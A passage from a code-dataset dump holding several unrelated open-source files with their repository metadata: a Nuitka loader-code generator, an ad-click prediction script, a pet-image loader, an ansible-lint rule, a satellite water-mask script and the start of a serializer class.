template_metapath_loader_bytecode_module_entry,
template_metapath_loader_compiled_module_entry,
template_metapath_loader_extension_module_entry,
)
def getModuleMetaPathLoaderEntryCode(module, bytecode_accessor):
module_c_name = encodePythonStringToC(
Plugins.encodeDataComposerName(module.getFullName().asString())
)
flags = ["NUITKA_TRANSLATED_FLAG"]
if (
not Options.isStandaloneMode()
and not Options.shallMakeModule()
and Options.getFileReferenceMode() == "original"
and python_version >= 0x370
):
# File system paths that will hopefully work, spell-checker: ignore getfilesystemencoding
if Options.isWin32Windows():
file_path = encodePythonUnicodeToC(module.getCompileTimeFilename())
else:
file_path = encodePythonStringToC(
module.getCompileTimeFilename().encode(sys.getfilesystemencoding())
)
else:
file_path = "NULL"
if module.isUncompiledPythonModule():
code_data = module.getByteCode()
is_package = module.isUncompiledPythonPackage()
flags.append("NUITKA_BYTECODE_FLAG")
if is_package:
flags.append("NUITKA_PACKAGE_FLAG")
accessor_code = bytecode_accessor.getBlobDataCode(
data=code_data,
name="bytecode of module '%s'" % module.getFullName(),
)
return template_metapath_loader_bytecode_module_entry % {
"module_name": module_c_name,
"bytecode": accessor_code[accessor_code.find("[") + 1 : -1],
"size": len(code_data),
"flags": " | ".join(flags),
"file_path": file_path,
}
elif module.isPythonExtensionModule():
flags.append("NUITKA_EXTENSION_MODULE_FLAG")
return template_metapath_loader_extension_module_entry % {
"module_name": module_c_name,
"flags": " | ".join(flags),
"file_path": file_path,
}
else:
if module.isCompiledPythonPackage():
flags.append("NUITKA_PACKAGE_FLAG")
return template_metapath_loader_compiled_module_entry % {
"module_name": module_c_name,
"module_identifier": module.getCodeName(),
"flags": " | ".join(flags),
"file_path": file_path,
}
def getMetaPathLoaderBodyCode(bytecode_accessor):
metapath_loader_inittab = []
metapath_module_decls = []
uncompiled_modules = getUncompiledModules()
for other_module in getDoneModules():
# Put those at the end.
if other_module in uncompiled_modules:
continue
metapath_loader_inittab.append(
getModuleMetaPathLoaderEntryCode(
module=other_module, bytecode_accessor=bytecode_accessor
)
)
if other_module.isCompiledPythonModule():
metapath_module_decls.append(
"""\
extern PyObject *modulecode_%(module_identifier)s(\
PyThreadState *tstate, PyObject *, struct Nuitka_MetaPathBasedLoaderEntry const *);"""
% {"module_identifier": other_module.getCodeName()}
)
# Do them now
for uncompiled_module in uncompiled_modules:
metapath_loader_inittab.append(
getModuleMetaPathLoaderEntryCode(
module=uncompiled_module, bytecode_accessor=bytecode_accessor
)
)
frozen_defs = []
# Only the non-technical ones need to be there.
for uncompiled_module in getUncompiledTechnicalModules():
module_name = uncompiled_module.getFullName()
code_data = uncompiled_module.getByteCode()
is_package = uncompiled_module.isUncompiledPythonPackage()
size = len(code_data)
# Packages are indicated with negative size.
if is_package:
size = -size
accessor_code = bytecode_accessor.getBlobDataCode(
data=code_data,
name="bytecode of module '%s'" % uncompiled_module.getFullName(),
)
frozen_defs.append(
"""\
{{"{module_name}", {start}, {size}}},""".format(
module_name=module_name,
start=accessor_code[accessor_code.find("[") + 1 : -1],
size=size,
)
)
if Options.isShowInclusion():
inclusion_logger.info("Embedded as frozen module '%s'." % module_name)
return template_metapath_loader_body % {
"metapath_module_decls": indented(metapath_module_decls, 0),
"metapath_loader_inittab": indented(metapath_loader_inittab),
"bytecode_count": bytecode_accessor.getConstantsCount(),
"frozen_modules": indented(frozen_defs),
}
|
Nuitka/Nuitka
|
nuitka/code_generation/LoaderCodes.py
|
LoaderCodes.py
|
py
| 5,236 |
python
|
en
|
code
| 10,019 |
github-code
|
6
|
[
{
"api_name": "nuitka.utils.CStrings.encodePythonStringToC",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "nuitka.plugins.Plugins.Plugins.encodeDataComposerName",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "nuitka.plugins.Plugins.Plugins",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.isStandaloneMode",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.shallMakeModule",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.getFileReferenceMode",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "nuitka.PythonVersions.python_version",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.isWin32Windows",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "nuitka.utils.CStrings.encodePythonUnicodeToC",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "nuitka.utils.CStrings.encodePythonStringToC",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "sys.getfilesystemencoding",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_bytecode_module_entry",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_extension_module_entry",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_compiled_module_entry",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "nuitka.ModuleRegistry.getUncompiledModules",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "nuitka.ModuleRegistry.getDoneModules",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "nuitka.ModuleRegistry.getUncompiledTechnicalModules",
"line_number": 122,
"usage_type": "call"
},
{
"api_name": "nuitka.Options.isShowInclusion",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "nuitka.Tracing.inclusion_logger.info",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "nuitka.Tracing.inclusion_logger",
"line_number": 148,
"usage_type": "name"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_body",
"line_number": 150,
"usage_type": "name"
},
{
"api_name": "Indentation.indented",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "Indentation.indented",
"line_number": 152,
"usage_type": "call"
},
{
"api_name": "Indentation.indented",
"line_number": 154,
"usage_type": "call"
}
] |
8747012693
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 24 23:16:21 2019
@author: ADMIN
"""
import pandas as pd
import numpy as np
import AllFunctions as af
#import dateutil
import math
item_data=pd.read_csv("item_data.csv")
log_data=pd.read_csv("view_log.csv",parse_dates=['server_time'],infer_datetime_format=True)
train_data=pd.read_csv("train.csv",parse_dates=['impression_time'],infer_datetime_format=True)
test_data=pd.read_csv("test.csv",parse_dates=['impression_time'],infer_datetime_format=True)
test_data['is_click']=-1
train_test_data=pd.concat([train_data,test_data],axis=0)
ismall=item_data.head(5)
#dfDesc=af.getDFDesc(item_data)
item_data=af.categorizeCols(item_data,cols=['item_id','category_1', 'category_2', 'category_3','product_type'])
#dfDesc=af.getDFDesc(item_data)
item_data['item_price_log']=np.log(item_data['item_price'])
#dfDesc=af.getDFDesc(log_data)
log_data=af.categorizeCols(log_data,cols=['session_id','user_id','item_id'])
#dfDesc=af.getDFDesc(log_data)
log_item_data=pd.merge(log_data,item_data,on='item_id')
train_test_data['impression_time_7less'] = train_test_data['impression_time'] - pd.to_timedelta(7, unit='d')
train_test_data.reset_index(inplace=True,drop=True)
"""user_ids_list = np.unique(log_data['user_id'])
minimptime=np.min(train_test_data['impression_time_7less'])
l=log_item_data.sample(frac=0.001,random_state=5)
l.to_csv('lShort.csv',index=False)
t=train_test_data.sample(frac=0.01,random_state=5)
t.to_csv('tShort.csv',index=False)"""
log_item_data.to_csv('log_item_data.csv',index=False)
train_test_data.to_csv('train_test_data.csv',index=False)
def calcAllOutputs(df):
visit_count = len(df)
total_sessions = len(np.unique(df['session_id']))
total_items = len(np.unique(df['item_id']))/visit_count
total_category_1 = len(np.unique(df['category_1']))/visit_count
total_category_2 = len(np.unique(df['category_2']))/visit_count
total_category_3 = len(np.unique(df['category_3']))/visit_count
total_product_type = len(np.unique(df['product_type']))/visit_count
item_price_max = np.max(df['item_price_log'])
item_price_min = np.min(df['item_price_log'])
item_price_avg = np.mean(df['item_price_log'])
item_price_std = np.std(df['item_price_log'])
item_price_rng = item_price_max - item_price_min
max_time=np.max(df['server_time'])
impid=np.max(df['impression_id'])
#diff = df['impression_time'] - max_time
#diff1 = diff.total_seconds()
res=[impid,visit_count,total_sessions ,total_items ,total_category_1 ,total_category_2 ,total_category_3 ,total_product_type ,item_price_max ,item_price_min ,item_price_avg ,item_price_std ,item_price_rng,max_time]
return res
def calcImpFeatures(df):
previous_imp_app_count=len(np.unique(df['app_code']))
max_time2=np.max(df['impression_time_y'])
impid=np.max(df['impression_id'])
return [impid,max_time2,previous_imp_app_count]
def calcAppFeatures(df):
previous_imp_same_app_count=len(np.unique(df['app_code']))
max_time3=np.max(df['impression_time_y'])
impid=np.max(df['impression_id'])
return [impid,max_time3,previous_imp_same_app_count]
def applymathfloor(x):
if np.isnan(x)==False:
return math.floor(x)
else:
return x
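# Feature set 1: aggregate each user's item views from the 7 days preceding the impression.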
dfC=train_test_data.merge(log_item_data,on='user_id')
print(len(dfC))
dfC2 = dfC[(dfC.server_time <= dfC.impression_time) & (dfC.server_time >= dfC.impression_time_7less)]
print(len(dfC2))
dfCHead=dfC2.head(100)
dfC3=dfC2.groupby('impression_id').apply(calcAllOutputs)
dfFeatureset1=pd.DataFrame.from_records(dfC3)
dfFeatureset1.columns=['impression_id','visit_count','total_sessions','total_items','total_category_1','total_category_2','total_category_3','total_product_type','item_price_max','item_price_min','item_price_avg','item_price_std','item_price_rng','max_time']
dfFeatureset1.to_csv('dfFeatureset1.csv',index=False)
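# Feature sets 2 and 3: join each impression with the same user's other impressions to summarise app counts and timing.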
dfC=train_test_data.merge(train_test_data[['user_id','impression_time','app_code']],on='user_id',suffixes=('', '_y'))
dfC2=dfC[dfC.impression_time<dfC.impression_time_y]
dfC3=dfC2.groupby('impression_id').apply(calcImpFeatures)
dfFeatureset2=pd.DataFrame.from_records(dfC3)
dfFeatureset2.columns=['impression_id','max_time2','previous_imp_app_count']
dfFeatureset2.to_csv('dfFeatureset2.csv',index=False)
dfC4=dfC2[dfC2.app_code==dfC2.app_code_y]
dfC5=dfC4.groupby('impression_id').apply(calcAppFeatures)
dfFeatureset3=pd.DataFrame.from_records(dfC5)
dfFeatureset3.columns=['impression_id','max_time3','previous_imp_same_app_count']
dfFeatureset3.to_csv('dfFeatureset3.csv',index=False)
"""
train_test_data=pd.read_csv('train_test_data.csv',parse_dates=['impression_time'],infer_datetime_format=True)
dfFeatureset1=pd.read_csv('dfFeatureset1.csv',parse_dates=['max_time'],infer_datetime_format=True)
dfFeatureset2=pd.read_csv('dfFeatureset2.csv',parse_dates=['max_time2'],infer_datetime_format=True)
dfFeatureset3=pd.read_csv('dfFeatureset3.csv',parse_dates=['max_time3'],infer_datetime_format=True)
"""
mergeddf=train_test_data.merge(dfFeatureset1,on='impression_id',how='left')
mergeddf=mergeddf.merge(dfFeatureset2,on='impression_id',how='left')
mergeddf=mergeddf.merge(dfFeatureset3,on='impression_id',how='left')
mergeddf['diff1']=(mergeddf['impression_time']-mergeddf['max_time']).dt.total_seconds()
mergeddf['diff2']=(mergeddf['max_time2']-mergeddf['impression_time']).dt.total_seconds()
mergeddf['diff3']=(mergeddf['max_time3']-mergeddf['impression_time']).dt.total_seconds()
train_test_data=mergeddf
s=train_test_data.app_code.value_counts()
s=s/len(train_test_data)
train_test_data['app_imp']=train_test_data['app_code'].apply(lambda x: s[x])
train_test_data['diff_days']=(train_test_data['diff1']/3600/24).apply(applymathfloor)
#train_test_data['diff_hours']=(train_test_data['diff1']/3600).apply(applymathfloor)
#train_test_data['diff_mins']=(train_test_data['diff1']/60).apply(applymathfloor)
#train_test_data['diff_secs']=(train_test_data['diff1']).apply(applymathfloor)
train_test_data['prev_diff_days']=(train_test_data['diff2']/3600/24).apply(applymathfloor)
#train_test_data['prev_diff_hours']=(train_test_data['diff2']/3600).apply(applymathfloor)
#train_test_data['prev_diff_mins']=(train_test_data['diff2']/60).apply(applymathfloor)
#train_test_data['prev_diff_secs']=(train_test_data['diff2']).apply(applymathfloor)
train_test_data['prev_app_diff_days']=(train_test_data['diff3']/3600/24).apply(applymathfloor)
#train_test_data['prev_app_diff_hours']=(train_test_data['diff3']/3600).apply(applymathfloor)
#train_test_data['prev_app_diff_mins']=(train_test_data['diff3']/60).apply(applymathfloor)
#train_test_data['prev_app_diff_secs']=(train_test_data['diff3']).apply(applymathfloor)
train_test_data['it_day_of_week'] = train_test_data['impression_time'].dt.dayofweek
train_test_data['it_month_start'] = train_test_data['impression_time'].dt.is_month_start
train_test_data['it_month_end'] = train_test_data['impression_time'].dt.is_month_end
train_test_data['it_weekday'] = train_test_data['impression_time'].apply(lambda x: x.weekday())
train_test_data=train_test_data.drop(columns=['impression_id','impression_time','user_id','impression_time_7less','app_code','max_time','max_time2','max_time3'])
train_test_data=train_test_data.drop(columns=['diff1','diff2','diff3'])
train_test_data=train_test_data.fillna(0)
train_test_data=af.categorizeCols(train_test_data,cols=['os_version','it_day_of_week','it_weekday'])
train_test_data=af.LabelEncodeCols(train_test_data.copy(),onehotColumns=[], categorical_columns=['os_version','it_day_of_week','it_weekday'])
train_test_data.to_csv("train_test_dataAll.csv",index=False)
#train_test_data=pd.read_csv('train_test_dataAll.csv')
X=train_test_data
#af.plot_corr(X)
# dropping correlated variables
X=X.drop(columns=['previous_imp_app_count','prev_app_diff_days'])
X=X.drop(columns=['total_category_1','total_category_2','total_category_3','total_sessions', 'item_price_min','item_price_max','item_price_std'])
X=X.drop(columns=['total_product_type','visit_count'])
print(X.columns)
pred_variable_type = "categorical"
target_variable='is_click'
TrainCleanVars={}
X_trainVal=X[X['is_click']!= -1]
X_test=X[X['is_click']== -1]
X_test=X_test.drop(columns=['is_click'])
X_trainVal.reset_index(inplace=True,drop=True)
X_test.reset_index(inplace=True,drop=True)
zeroOneCols=X_trainVal.apply(lambda x: af.ChkZeroOne(x))
standarizeCols=list(zeroOneCols[zeroOneCols==False].index)
X_trainVal,scaler=af.normalize(X_trainVal,standarizeCols)
#standarizeCols.remove(target_variable)
X_test=af.normalize(X_test,standarizeCols,scaler)
trainVal_frame=X_trainVal
x_cols=list(X_trainVal.columns)
y_col=target_variable
trainVal_frame[target_variable] = trainVal_frame[target_variable].astype(np.uint8)
class_weights=af.GetClassWeights(trainVal_frame[target_variable])
trainVal_frame['class_weights'] =[class_weights[x] for x in trainVal_frame[target_variable]]
import H2OHandler as hh
# h2o.cluster().shutdown(prompt=True)
print("Start H2O model training")
#H2o internally uses k-fold cross validation
res,PredDF,predtrain,ptrain=hh.GetBestH2OModel(trainVal_frame,x_cols,y_col,pred_variable_type == "categorical",X_test,weights_column='class_weights',stopping_metric='AUC')
TrainCleanVars['H2OBestModel']=res.leader
X_test[target_variable]=PredDF['predict']
X_test[standarizeCols]=scaler.inverse_transform(X_test[standarizeCols])
ts=af.GetTimeStamp()
af.PickleWrite(TrainCleanVars,"TrainCleanVars"+str(ts)+".pkl")
X_test['impression_id']=test_data['impression_id']
final_sub=X_test[['impression_id',target_variable]]
final_sub.to_csv('samplesubmission'+str(ts)+'.csv',index=False)
lb=res.leaderboard
lbres=lb[:5,"model_id"]
import h2o
m = h2o.get_model(lb[0,"model_id"])
varimpres=m.varimp(use_pandas=True)
lbscores=lb.head(rows=lb.nrows).as_data_frame()
|
kinjaldand/MLProjects
|
AdClickPredictWNSHack/Work2.py
|
Work2.py
|
py
| 9,745 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "AllFunctions.categorizeCols",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "AllFunctions.categorizeCols",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "pandas.merge",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "pandas.to_timedelta",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame.from_records",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 108,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame.from_records",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 115,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame.from_records",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 121,
"usage_type": "attribute"
},
{
"api_name": "AllFunctions.categorizeCols",
"line_number": 171,
"usage_type": "call"
},
{
"api_name": "AllFunctions.LabelEncodeCols",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "AllFunctions.ChkZeroOne",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "AllFunctions.normalize",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "AllFunctions.normalize",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 210,
"usage_type": "attribute"
},
{
"api_name": "AllFunctions.GetClassWeights",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "H2OHandler.GetBestH2OModel",
"line_number": 218,
"usage_type": "call"
},
{
"api_name": "AllFunctions.GetTimeStamp",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "AllFunctions.PickleWrite",
"line_number": 225,
"usage_type": "call"
},
{
"api_name": "h2o.get_model",
"line_number": 236,
"usage_type": "call"
}
] |
72833443067
|
# PET DATA PROCESSING
import numpy as np
import matplotlib.pyplot as plt
from pathlib import Path
num_examples = 1386
num_examples2 = 1386
res = 64
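# Fill X/y in place: each breed folder holds original, flip, twist and twistflip variants of the cropped images.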
def folder_to_array(file_name, cat_name, X, idx1, numf, numt, y, label):
idx_normal = range(idx1, idx1+numf)
idx_flip = range(idx1+numf, idx1+2*numf)
idx_twist = range(idx1+2*numf, idx1+2*numf+numt)
idx_twistflip = range(idx1+2*numf+numt, idx1+2*numf+2*numt)
modes = ['','flip/','twist/','twistflip/']
for m, idx_range in enumerate([idx_normal, idx_flip, idx_twist, idx_twistflip]):
file_no = 0
my_file = Path('')
for i in idx_range:
while my_file.is_file() == False:
file_no += 1
my_file = Path(file_name+modes[m]+cat_name+str(file_no)+'.jpg')
X[i, :, :, :] = plt.imread(file_name+modes[m]+cat_name+str(file_no)+'.jpg', format='jpg')
y[i, :] = label
my_file = Path('')
def gen():
X_data = np.zeros((num_examples, res, res, 3), dtype='uint8')
y_data = np.zeros((num_examples, 2))
X_data2 = np.zeros((num_examples2, res, res, 3), dtype='uint8')
y_data2 = np.zeros((num_examples2, 2))
British_Shorthair = 'Pets/crop64_british_shorthair/'
Siamese = 'Pets/crop64_siamese/'
Persian = 'Pets/crop64_persian/'
Ragdoll = 'Pets/crop64_ragdoll/'
Bengal = 'Pets/crop64_bengal/'
Bombay = 'Pets/crop64_bombay/'
# TASK 1 DATA
folder_to_array(British_Shorthair, 'British_Shorthair_', X_data, 0, 200, 147, y_data, np.array([1., 0.]))
folder_to_array(Siamese, 'Siamese_', X_data, 694, 200, 146, y_data, np.array([0., 1.]))
# TASK 2 DATA
folder_to_array(Siamese, 'Siamese_', X_data2, 0, 200, 146, y_data2, np.array([1., 0.]))
folder_to_array(British_Shorthair, 'British_Shorthair_', X_data2, 692, 200, 147, y_data2, np.array([0., 1.]))
return X_data, y_data, X_data2, y_data2
|
alexgilbert747/thesis
|
pets_data2.py
|
pets_data2.py
|
py
| 1,969 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pathlib.Path",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.imread",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 50,
"usage_type": "call"
}
] |
18920197222
|
from __future__ import annotations
import sys
from typing import TYPE_CHECKING
from ansiblelint.rules import AnsibleLintRule
if TYPE_CHECKING:
from ansiblelint.file_utils import Lintable
from ansiblelint.utils import Task
def _changed_in_when(item: str) -> bool:
if not isinstance(item, str):
return False
item_list = item.split()
if {"and", "or", "not"} & set(item_list):
return False
return any(
changed in item
for changed in [
".changed",
"|changed",
'["changed"]',
"['changed']",
"is changed",
]
)
class UseHandlerRatherThanWhenChangedRule(AnsibleLintRule):
"""Tasks that run when changed should likely be handlers."""
id = "no-handler"
description = (
"If a task has a ``when: result.changed`` setting, it is effectively "
"acting as a handler. You could use ``notify`` and move that task to "
"``handlers``."
)
link = "https://docs.ansible.com/ansible/latest/playbook_guide/playbooks_handlers.html#handlers"
severity = "MEDIUM"
tags = ["idiom"]
version_added = "historic"
def matchtask(
self,
task: Task,
file: Lintable | None = None,
) -> bool | str:
if task["__ansible_action_type__"] != "task" or task.is_handler():
return False
when = task.get("when")
result = False
if isinstance(when, list):
if len(when) <= 1:
result = _changed_in_when(when[0])
elif isinstance(when, str):
result = _changed_in_when(when)
return result
if "pytest" in sys.modules:
import pytest
# pylint: disable=ungrouped-imports
from ansiblelint.rules import RulesCollection
from ansiblelint.runner import Runner
from ansiblelint.testing import run_ansible_lint
@pytest.mark.parametrize(
("test_file", "failures"),
(
pytest.param("examples/playbooks/no_handler_fail.yml", 5, id="fail"),
pytest.param("examples/playbooks/no_handler_pass.yml", 0, id="pass"),
),
)
def test_no_handler(
default_rules_collection: RulesCollection,
test_file: str,
failures: int,
) -> None:
"""Test rule matches."""
results = Runner(test_file, rules=default_rules_collection).run()
assert len(results) == failures
for result in results:
assert result.tag == "no-handler"
def test_role_with_handler() -> None:
"""Test role with handler."""
role_path = "examples/roles/role_with_handler"
results = run_ansible_lint("-v", role_path)
assert "no-handler" not in results.stdout
|
ansible/ansible-lint
|
src/ansiblelint/rules/no_handler.py
|
no_handler.py
|
py
| 2,753 |
python
|
en
|
code
| 3,198 |
github-code
|
6
|
[
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "ansiblelint.rules.AnsibleLintRule",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "ansiblelint.utils.Task",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "ansiblelint.file_utils.Lintable",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "sys.modules",
"line_number": 65,
"usage_type": "attribute"
},
{
"api_name": "ansiblelint.rules.RulesCollection",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "ansiblelint.runner.Runner",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "pytest.param",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "pytest.param",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "ansiblelint.testing.run_ansible_lint",
"line_number": 95,
"usage_type": "call"
}
] |
6368283311
|
import datacube
import sys
import xarray as xr
import numpy as np
import geopandas as gpd
from datacube.virtual import construct_from_yaml
from datacube.storage.masking import mask_invalid_data
from osgeo import gdal, osr
site = sys.argv[1]
grid = gpd.read_file('/scratch/a.klh5/mangrove_data/shapefiles/{}.shp'.format(site))
bounds = grid.total_bounds
xmin = bounds[0]
xmax = bounds[2]
ymin = bounds[3]
ymax = bounds[1]
crs = int(grid.crs['init'].split(':')[1])
srs = osr.SpatialReference()
srs.ImportFromEPSG(crs)
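# Virtual product collating green/NIR/red surface reflectance from Landsat 4, 5, 7 and 8.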
combined_ls_sref = construct_from_yaml("""
collate:
- product: ls4_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
- product: ls5_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
- product: ls7_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
- product: ls8_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
""")
def getDataset(crs, xmin, xmax, ymin, ymax):
"Fetch all data for the given area."
print("Fetching data...")
fetch_ds = combined_ls_sref.query(dc, x=(xmin, xmax), y=(ymin, ymax), crs='EPSG:{}'.format(crs), time=('2009-01-01', '2011-12-31'))
grouped_ds = combined_ls_sref.group(fetch_ds, resolution=(-30, 30), output_crs='EPSG:{}'.format(crs))
ds = combined_ls_sref.fetch(grouped_ds)
ds = mask_invalid_data(ds)
print("Done.")
return(ds)
def getNDWI(ds):
print("Generating NDWI...")
ds['NDWI'] = (ds.green - ds.NIR) / (ds.green + ds.NIR)
avg = ds.NDWI.mean('time', skipna=True)
print("Producing mask...")
wm = xr.where(avg >= -0.3, 1, 0)
wm = wm.fillna(255)
wm = wm.astype('uint8')
wm = wm.sortby("y", ascending=False)
print("Done.")
return(wm)
def outputToFile(output):
outfile = '{}.kea'.format(site)
# Output to KEA file
x_size = len(output.x.values)
y_size = len(output.y.values)
x_min = np.amin(output.x.values)
y_max = np.amax(output.y.values)
geo_transform = (x_min, 30, 0.0, y_max, 0.0, -30)
driver = gdal.GetDriverByName('KEA')
output_raster = driver.Create(outfile, x_size, y_size, 1, 1) # Only one band, byte data type since there are only 2 values
output_raster.SetProjection(srs.ExportToWkt())
output_raster.SetGeoTransform(geo_transform)
raster_band = output_raster.GetRasterBand(1)
raster_band.SetNoDataValue(255)
raster_band.SetDescription("mask")
raster_band.WriteArray(output.values)
output_raster = None
dc = datacube.Datacube()
ds = getDataset(crs, xmin, xmax, ymin, ymax)
wm = getNDWI(ds)
outputToFile(wm)
|
klh5/wm_generator
|
gen_water_mask.py
|
gen_water_mask.py
|
py
| 2,809 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "geopandas.read_file",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "osgeo.osr.SpatialReference",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "osgeo.osr",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "datacube.virtual.construct_from_yaml",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "datacube.storage.masking.mask_invalid_data",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "xarray.where",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "numpy.amax",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal.GetDriverByName",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "datacube.Datacube",
"line_number": 103,
"usage_type": "call"
}
] |
28970147437
|
import typing as t
import collections
import flask_restx
import flask_restx.fields as frf
import marshmallow.fields as mf
from marshmallow_pynamodb import ModelSchema
from model.base_model import Model
from common.util import create_table
class Serializer(ModelSchema):
_api_model = None
def __init__(self, *args, **kwargs):
super(Serializer, self).__init__(*args, **kwargs)
create_table(self.model())
@property
def api_model(self):
if self._api_model is None:
self._api_model = self._get_api_model()
return self._api_model
def loads_required(self, json_data: str, many: bool = False):
data = self.loads(json_data=json_data, many=many).attribute_values
if many:
